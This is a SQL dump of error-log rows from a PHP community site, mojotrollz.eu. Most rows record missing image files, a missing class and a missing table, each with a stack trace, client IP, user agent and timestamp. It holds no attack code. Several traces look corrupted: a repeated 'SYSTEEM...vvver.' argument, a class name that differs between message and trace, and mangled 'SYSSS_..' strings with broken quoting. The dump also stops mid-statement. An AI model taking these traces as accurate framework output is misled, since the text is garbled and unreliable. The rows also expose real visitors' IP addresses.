`request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (117, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'Parteitermin_male.png\' found.', 'd18af4b47cc972033115cd7440d49f4234289ff9', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'default_page\', \'Parteitermin_ma...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'default_page\', \'Parteitermin_ma...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '80.140.245.215', 0.096, '2014-11-04 15:38:25', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=default_page&id=Parteitermin_male.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 5, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (118, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'Stadtvertretung_male.png\' found.', '234c64e2d8b04aee05289fe2cf87cf5fd8269665', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'default_page\', \'Stadtvertretung...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'default_page\', \'Stadtvertretung...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '80.140.245.215', 0.104, '2014-11-04 15:38:25', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=default_page&id=Stadtvertretung_male.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 5, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (119, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'Fortbildung_male.png\' found.', '11fd462e5c7fb4ada7081c3241f461e8a7ae3b95', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'default_page\', \'Fortbildung_mal...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'default_page\', \'Fortbildung_mal...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '80.140.245.215', 0.104, '2014-11-04 15:38:25', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=default_page&id=Fortbildung_male.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 5, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (120, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'orc_female.png\' found.', 'f542e7b9ad4ce7ec4cbfa325afbef3f9b97d7494', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'orc_female.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'orc_female.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '80.140.245.215', 0.032, '2014-11-19 02:15:20', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=orc_female.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 461, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (121, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'Stadtvertretung_female.png\' found.', '717f908e63ce6f91dc492ffb435cba95326cdbee', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'Stadtvertretung...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'Stadtvertretung...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '80.140.245.215', 0.036, '2014-11-04 15:38:25', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=Stadtvertretung_female.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 3, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (122, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'Fortbildung_female.png\' found.', 'e676f53a977e92636c7fe0b9b8d2d073fca60b03', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'Fortbildung_fem...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'Fortbildung_fem...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '80.140.245.215', 0.008, '2014-11-04 15:38:25', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=Fortbildung_female.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 3, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (123, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'Parteitermin_female.png\' found.', '476ce9dbadf377b3a2a14d312745794e743f63dc', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'wowicons\', \'Parteitermin_fe...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'wowicons\', \'Parteitermin_fe...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '80.140.245.215', 0.012, '2014-11-04 15:38:25', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=wowicons&id=Parteitermin_female.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 3, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (124, 'SYSTEM\\LOG\\ERROR', 'Class not found: DBD\\CHAR_STATS', 'eb3e4ddf913d37a5c36960a9f089181c98d8528c', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'DBD\\\\CHAR_SSTAS\')\n#1 /home/web/webdir/mojotrollz/mojotrollz/page/user_start/user_start.php(77): spl_autoload_call(\'DBD\\\\CHAR_SSTAS\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/page/user_start/user_start.php(106): user_start->get_char_statistics()\n#3 /home/web/webdir/mojotrollz/index.php(12): user_start->html()\n#4 {main}', '80.140.245.215', 0.056, '2014-11-04 16:15:08', 'mojotrollz.eu', 80, '/web/mojotrollz/?page=user_start', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (125, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'Rouge.png\' found.', '28c85b9fdf331c542266dbc0268e023f05b8631f', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'class\', \'Rouge.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'class\', \'Rouge.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '80.140.245.215', 0.008, '2014-11-04 16:22:49', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=class&id=Rouge.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 5, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (126, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'.png\' found.', '3f83c3d54ac7bd2d1e59cb6ed37abfa812b2d97c', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'class\', \'.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'class\', \'.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '80.140.245.215', 0.008, '2014-11-04 16:24:32', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=class&id=.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 0, b'0', 0, 6, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (127, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'Retribution\' found.', 'a376dcc9d76271055cf19740892eed7303010826', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_tree\', \'Retribution\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_tree\', \'Retribution\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.004, '2014-11-04 17:05:43', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_tree&id=Retribution', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0', 13, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (128, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'paladinretribution.jpg\' found.', 'c4cb8c5d0654ac5a7ea93c35b0db825045ec6613', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_tree\', \'paladinretribut...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_tree\', \'paladinretribut...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.004, '2014-11-04 17:12:20', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_tree&id=paladinretribution.jpg', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0', 13, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (129, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'paladinholy.jpg\' found.', '0a1da4f03a0db9da733c0fe5e178e63efcbe2bb2', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_tree\', \'paladinholy.jpg\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_tree\', \'paladinholy.jpg\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.004, '2014-11-04 17:12:20', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_tree&id=paladinholy.jpg', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0', 13, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (130, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'paladinprotection.jpg\' found.', '0a1ceb81acf1dd750191e5f941a558f2bebf5129', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_tree\', \'paladinprotecti...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_tree\', \'paladinprotecti...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.004, '2014-11-04 17:12:21', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_tree&id=paladinprotection.jpg', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0', 13, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (131, 'ERROR', 'Could not edit tree.', '3fbc1d9edd1186a05353ce0b29f94e0c601772cb', 1, '/home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_skilltree/saimod_mojotrollz_skilltree.php', 22, '#0 [internal function]: saimod_mojotrollz_skilltree::sai_mod_saimod_mojotrollz_skilltree_action_tree_edit(\'2\', \'Holy\', \'paladinholy.jpg\', \'Protection\', \'paladinprotecti...\', \'Retribution\', \'paladinretribut...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'saimod_mojotrol...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.197', 0.052, '2014-11-04 17:12:23', 'mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_skilltree&action=tree_edit&class=2&t1n=Holy&t1i=paladinholy.jpg&t2n=Protection&t2i=paladinprotection.jpg&t3n=Retribution&t3i=paladinretribution.jpg', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0', 13, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (132, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'hunterBeastmastery.jpg\' found.', 'cf7f60ca1814489259a931268ee6852e9223b6de', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_tree\', \'hunterBeastmast...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_tree\', \'hunterBeastmast...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.008, '2014-11-04 17:13:18', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_tree&id=hunterBeastmastery.jpg', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0', 13, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (133, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'rugueSubtlety.jpg\' found.', '203fd546ddbc749d22615bd6ccca8467eda4c4d4', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_tree\', \'rugueSubtlety.j...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_tree\', \'rugueSubtlety.j...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.197', 0.008, '2014-11-04 17:13:57', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_tree&id=rugueSubtlety.jpg', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0', 13, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (134, 'SYSTEM\\LOG\\TODO', 'Do ToDo Stats', 'abac635d0d847ddc5463823a644503c4a0c14ef8', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 58, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_stats()\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'\\\\SYSTEEM\\\\SAI\\\\sssai.\',Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.197', 0.012, '2014-11-11 12:30:56', 'mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=stats', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 10, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (135, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: Table \'host_mojotrollz.system_pagestates\' doesn\'t exist', '89c56296a24c4802ae979ff4e3ac2afca6f2d4b7', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(33): SYSTEM\\DB\\ConnectionMYS->prepare(\'SYSTEM\\\\DBD\\\\SYSSS_..\' \'SELECT * FROM s...\', Array)\n#1 /home/web/webdir/mojotrollz/system/db/qq/QP.php(14): SYSTEM\\DB\\Connection->prepare(\'SYSTEM\\\\DBD\\\\SYSSS_..\' \'SELECT * FROM s...\', Array)\n#2 /home/web/webdir/mojotrollz/system/db/qq/QP.php(18): SYSTEM\\DB\\QP::QQ(Array, NULL)\n#3 /home/web/webdir/mojotrollz/system/page/State.php(6): SYSTEM\\DB\\QP::QA(Array)\n#4 /home/web/webdir/mojotrollz/system/api/api_system.php(16): SYSTEM\\PAGE\\State::get(\'1\')\n#5 [internal function]: SYSTEM\\API\\api_system::call_pagestates(\'1\')\n#6 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#7 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#8 {main}', '37.24.151.115', 0.016, '2014-11-07 00:45:30', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=pagestates&group=1', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 3, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (136, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 2; statics: 0; req_command: 1; req_param: 0; opt_param: 0; url: /web/mojotrollz/api.php?call=page&group=1', '031657bd7bb23e149ff860d7eee8d11cad1518a0', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#2 {main}', '37.24.151.115', 0.016, '2014-11-15 04:13:17', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=page&group=1', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 4, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (137, 'SYSTEM\\LOG\\ERROR', 'Class not found: SYSTEM\\DBD\\SYS_PAGESTATES_GROUP', 'de95972cd1400fb50bf5dc073de94b16419a8c97', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'SYSTEM\\\\DBD\\\\SYSSS_..)\n#1 /home/web/webdir/mojotrollz/system/page/State.php(6): spl_autoload_call(\'SYSTEM\\\\DBD\\\\SYSSS_..)\n#2 /home/web/webdir/mojotrollz/system/api/api_system.php(16): SYSTEM\\PAGE\\State::get(\'1\')\n#3 [internal function]: SYSTEM\\API\\api_system::call_page(\'1\')\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 